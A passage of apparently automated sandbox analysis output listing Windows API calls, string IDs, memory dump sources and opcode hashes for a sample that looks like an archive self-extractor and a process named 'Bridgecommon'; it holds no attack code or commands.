                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00CC7E24,00000000,?,00CC7DC4,00000000,00CDC300,0000000C,00CC7F1B,00000000,00000002), ref: 00CC7EC9
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              APIs
                                                                                                • Part of subcall function 00CB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CB0836
                                                                                                • Part of subcall function 00CB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAF2D8,Crypt32.dll,00000000,00CAF35C,?,?,00CAF33E,?,?,?), ref: 00CB0858
                                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CAF2E4
                                                                                              • GetProcAddress.KERNEL32(00CE81C8,CryptUnprotectMemory), ref: 00CAF2F4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                              • API String ID: 2141747552-1753850145
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2252061734-0
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00CCBF39
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CCBF5C
                                                                                                • Part of subcall function 00CC8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CCCA2C,00000000,?,00CC6CBE,?,00000008,?,00CC91E0,?,?,?), ref: 00CC8E38
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CCBF82
                                                                                              • _free.LIBCMT ref: 00CCBF95
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CCBFA4
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,?,00CC91AD,00CCB188,?,00CC9813,00000001,00000364,?,00CC3F73,00000050,?,00CE1030,00000200), ref: 00CC986E
                                                                                              • _free.LIBCMT ref: 00CC98A3
                                                                                              • _free.LIBCMT ref: 00CC98CA
                                                                                              • SetLastError.KERNEL32(00000000,?,00CE1030,00000200), ref: 00CC98D7
                                                                                              • SetLastError.KERNEL32(00000000,?,00CE1030,00000200), ref: 00CC98E0
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              APIs
                                                                                                • Part of subcall function 00CB11CF: ResetEvent.KERNEL32(?), ref: 00CB11E1
                                                                                                • Part of subcall function 00CB11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00CB11F5
                                                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00CB0F21
                                                                                              • CloseHandle.KERNEL32(?,?), ref: 00CB0F3B
                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00CB0F54
                                                                                              • CloseHandle.KERNEL32(?), ref: 00CB0F60
                                                                                              • CloseHandle.KERNEL32(?), ref: 00CB0F6C
                                                                                                • Part of subcall function 00CB0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00CB1206,?), ref: 00CB0FEA
                                                                                                • Part of subcall function 00CB0FE4: GetLastError.KERNEL32(?), ref: 00CB0FF6
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 1868215902-0
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00CCC817
                                                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                                                              • _free.LIBCMT ref: 00CCC829
                                                                                              • _free.LIBCMT ref: 00CCC83B
                                                                                              • _free.LIBCMT ref: 00CCC84D
                                                                                              • _free.LIBCMT ref: 00CCC85F
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00CB1FE5
                                                                                              • _wcslen.LIBCMT ref: 00CB1FF6
                                                                                              • _wcslen.LIBCMT ref: 00CB2006
                                                                                              • _wcslen.LIBCMT ref: 00CB2014
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00CAB371,?,?,00000000,?,?,?), ref: 00CB202F
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CompareString
                                                                                              • String ID:
                                                                                              • API String ID: 3397213944-0
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00CC891E
                                                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                                                              • _free.LIBCMT ref: 00CC8930
                                                                                              • _free.LIBCMT ref: 00CC8943
                                                                                              • _free.LIBCMT ref: 00CC8954
                                                                                              • _free.LIBCMT ref: 00CC8965
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: _swprintf
                                                                                              • String ID: %ls$%s: %s
                                                                                              • API String ID: 589789837-2259941744
                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CC31FB
                                                                                              • _abort.LIBCMT ref: 00CC3306
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: EncodePointer_abort
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 948111806-2084237596
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA7406
                                                                                                • Part of subcall function 00CA3BBA: __EH_prolog.LIBCMT ref: 00CA3BBF
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00CA74CD
                                                                                                • Part of subcall function 00CA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CA7AAB
                                                                                                • Part of subcall function 00CA7A9C: GetLastError.KERNEL32 ref: 00CA7AF1
                                                                                                • Part of subcall function 00CA7A9C: CloseHandle.KERNEL32(?), ref: 00CA7B00
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                              • API String ID: 3813983858-639343689
                                                                                              APIs
                                                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00CBAD98
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00CBADAD
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CBADC2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: ASKNEXTVOL
                                                                                              • API String ID: 445417207-3402441367
                                                                                              APIs
                                                                                              • __fprintf_l.LIBCMT ref: 00CAD954
                                                                                              • _strncpy.LIBCMT ref: 00CAD99A
                                                                                                • Part of subcall function 00CB1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00CE1030,00000200,00CAD928,00000000,?,00000050,00CE1030), ref: 00CB1DC4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                              • String ID: $%s$@%s
                                                                                              • API String ID: 562999700-834177443
                                                                                              APIs
                                                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00CAAC5A,00000008,?,00000000,?,00CAD22D,?,00000000), ref: 00CB0E85
                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00CAAC5A,00000008,?,00000000,?,00CAD22D,?,00000000), ref: 00CB0E8F
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00CAAC5A,00000008,?,00000000,?,00CAD22D,?,00000000), ref: 00CB0E9F
                                                                                              Strings
                                                                                              • Thread pool initialization failed., xrefs: 00CB0EB7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                              • String ID: Thread pool initialization failed.
                                                                                              • API String ID: 3340455307-2182114853
                                                                                              APIs
                                                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00CBB2BE
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00CBB2D6
                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00CBB304
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 445417207-3292211884
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                              • API String ID: 0-56093855
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00CA7F69,?,?,?), ref: 00CAA3FA
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00CA7F69,?), ref: 00CAA43E
                                                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00CA7F69,?,?,?,?,?,?,?), ref: 00CAA4BF
                                                                                              • CloseHandle.KERNEL32(?,?,?,00000800,?,00CA7F69,?,?,?,?,?,?,?,?,?,?), ref: 00CAA4C6
                                                                                              Similarity
                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                              • String ID:
                                                                                              • API String ID: 2287278272-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 176396367-0
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00CC91E0,?,00000000,?,00000001,?,?,00000001,00CC91E0,?), ref: 00CCC9D5
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CCCA5E
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00CC6CBE,?), ref: 00CCCA70
                                                                                              • __freea.LIBCMT ref: 00CCCA79
                                                                                                • Part of subcall function 00CC8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CCCA2C,00000000,?,00CC6CBE,?,00000008,?,00CC91E0,?,?,?), ref: 00CC8E38
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                              • String ID:
                                                                                              • API String ID: 2652629310-0
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00CBA666
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CBA675
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CBA683
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00CBA691
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              APIs
                                                                                                • Part of subcall function 00CBA699: GetDC.USER32(00000000), ref: 00CBA69D
                                                                                                • Part of subcall function 00CBA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CBA6A8
                                                                                                • Part of subcall function 00CBA699: ReleaseDC.USER32(00000000,00000000), ref: 00CBA6B3
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00CBA83C
                                                                                                • Part of subcall function 00CBAAC9: GetDC.USER32(00000000), ref: 00CBAAD2
                                                                                                • Part of subcall function 00CBAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00CBAB01
                                                                                                • Part of subcall function 00CBAAC9: ReleaseDC.USER32(00000000,?), ref: 00CBAB99
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ObjectRelease$CapsDevice
                                                                                              • String ID: (
                                                                                              • API String ID: 1061551593-3887548279
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA75E3
                                                                                                • Part of subcall function 00CB05DA: _wcslen.LIBCMT ref: 00CB05E0
                                                                                                • Part of subcall function 00CAA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CAA598
                                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA777F
                                                                                                • Part of subcall function 00CAA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA501
                                                                                                • Part of subcall function 00CAA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA532
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                              • String ID: :
                                                                                              • API String ID: 3226429890-336475711
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: }
                                                                                              • API String ID: 176396367-4239843852
                                                                                              APIs
                                                                                                • Part of subcall function 00CAF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CAF2E4
                                                                                                • Part of subcall function 00CAF2C5: GetProcAddress.KERNEL32(00CE81C8,CryptUnprotectMemory), ref: 00CAF2F4
                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,00CAF33E), ref: 00CAF3D2
                                                                                              Strings
                                                                                              • CryptUnprotectMemory failed, xrefs: 00CAF3CA
                                                                                              • CryptProtectMemory failed, xrefs: 00CAF389
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CurrentProcess
                                                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                              • API String ID: 2190909847-396321323
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00CAB9B8
                                                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: __vswprintf_c_l_swprintf
                                                                                              • String ID: %c:\
                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00010000,00CB1160,?,00000000,00000000), ref: 00CB1043
                                                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 00CB108A
                                                                                                • Part of subcall function 00CA6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA6C54
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                              • String ID: CreateThread failed
                                                                                              APIs
                                                                                                • Part of subcall function 00CAE2E8: _swprintf.LIBCMT ref: 00CAE30E
                                                                                                • Part of subcall function 00CAE2E8: _strlen.LIBCMT ref: 00CAE32F
                                                                                                • Part of subcall function 00CAE2E8: SetDlgItemTextW.USER32(?,00CDE274,?), ref: 00CAE38F
                                                                                                • Part of subcall function 00CAE2E8: GetWindowRect.USER32(?,?), ref: 00CAE3C9
                                                                                                • Part of subcall function 00CAE2E8: GetClientRect.USER32(?,?), ref: 00CAE3D5
                                                                                              • GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                                              • SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                              • String ID: 0
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00CB1206,?), ref: 00CB0FEA
                                                                                              • GetLastError.KERNEL32(?), ref: 00CB0FF6
                                                                                                • Part of subcall function 00CA6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA6C54
                                                                                              Strings
                                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00CB0FFF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00CADA55,?), ref: 00CAE2A3
                                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00CADA55,?), ref: 00CAE2B1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: FindHandleModuleResource
                                                                                              • String ID: RTL
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: CommandLine
                                                                                              • String ID: `%y

                                                                                              Execution Graph

                                                                                              Execution Coverage:6.9%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:3
                                                                                              Total number of Limit Nodes:0
                                                                                              execution_graph 9184 7ffd9be76381 9185 7ffd9be7639f QueryFullProcessImageNameA 9184->9185 9187 7ffd9be76544 9185->9187

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1997541214.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9be70000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID: FullImageNameProcessQuery
                                                                                              • String ID:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a76e692f682c39a097e3af15232d53955c139fef8a18b822a4fbcf7f0492dac8
                                                                                              • Instruction ID: 8ac27a1720ddaeee308c630b4011d0bf04d2fd96d68048d3572dfe2efbf426f6
                                                                                              • Opcode Fuzzy Hash: a76e692f682c39a097e3af15232d53955c139fef8a18b822a4fbcf7f0492dac8
                                                                                              • Instruction Fuzzy Hash: 0021E736B0D6499FE732E7A898710EC7B60EF92226F4542B3D0588B1E3D9682646C785
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9a69246afc0d9513fbabed8dda7716bbc8229d182d0b2629a8138c7b5d53fea0
                                                                                              • Instruction ID: 8ecbdc433f6c6aeabb67a2672d2cfe2d71e1c4d3cbc927a0001d5a233f02f11a
                                                                                              • Opcode Fuzzy Hash: 9a69246afc0d9513fbabed8dda7716bbc8229d182d0b2629a8138c7b5d53fea0
                                                                                              • Instruction Fuzzy Hash: DA216221F0E90E4BEBB4E76884786B86292EFD4711F4643B5D40DC72F2EDB8AE418740
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cceb765cd7d278859e5b20285bc2b4182da156627d2ad5c52836a51508e7ff97
                                                                                              • Instruction ID: d56f1f7e036786d0397f16634f791572f8b08ee17f2cff34423b0dc15afac97e
                                                                                              • Opcode Fuzzy Hash: cceb765cd7d278859e5b20285bc2b4182da156627d2ad5c52836a51508e7ff97
                                                                                              • Instruction Fuzzy Hash: CD11ED35A0E28C8FE722DBA888701DC7FB0EF92611F4642F7D084DB2A2D9382645C784
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9b740f2f91dfb6a78a785e56724a764c0c26b1490b49d3c9c4ecc45a74a28d0a
                                                                                              • Instruction ID: 89880bc378c7becc4a535ebbbe995d79ff760e0672e7c7a9dc768ba78011436e
                                                                                              • Opcode Fuzzy Hash: 9b740f2f91dfb6a78a785e56724a764c0c26b1490b49d3c9c4ecc45a74a28d0a
                                                                                              • Instruction Fuzzy Hash: E501DE35A0E38C9FE722DBA8C86019C7FB0EF82701F4642E7D044DB2A2D9386A44C780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e0c25d66f0bd2f0040109aff44b270d5240011debeea609b5aa75535b5ca2caa
                                                                                              • Instruction ID: 4c747736ce06db6f06195de5f38f3eb2660c79216c3e6b300e05bc932a1fe96d
                                                                                              • Opcode Fuzzy Hash: e0c25d66f0bd2f0040109aff44b270d5240011debeea609b5aa75535b5ca2caa
                                                                                              • Instruction Fuzzy Hash: 3A01DF34E0E38D9FE722DBA4887459C7FB0EF56701F5542E7D054DB2A2D9786A44C740
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                                              • Instruction ID: 04225abf947b6779623892e0e3b1a668b8e5af2c3aceb391021f9c530c4332bb
                                                                                              • Opcode Fuzzy Hash: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                                              • Instruction Fuzzy Hash: F4F0E134B5981E8AEBB4A754C8647B87362FBD0711F5543F9C00D931A1DEB86A81CB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1e558dd8236e8a588d37156f6ebd8144b9593da91a6e1c69f3e2f067ed0d220f
                                                                                              • Instruction ID: 5afcf77b276a09ab29f865372710c162235bc7af3cbe879b44190248c4e77ad2
                                                                                              • Opcode Fuzzy Hash: 1e558dd8236e8a588d37156f6ebd8144b9593da91a6e1c69f3e2f067ed0d220f
                                                                                              • Instruction Fuzzy Hash: 7BF02B3171EA49CFC742DB38DC999E47F60EF47205BAA15FAC08AC7572C220596ECB41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1986610362.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                                              • Instruction ID: 5b195def51be91ae4969184ead09916cb35b04be2a8bfae561cac835b3aa5050
                                                                                              • Opcode Fuzzy Hash: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
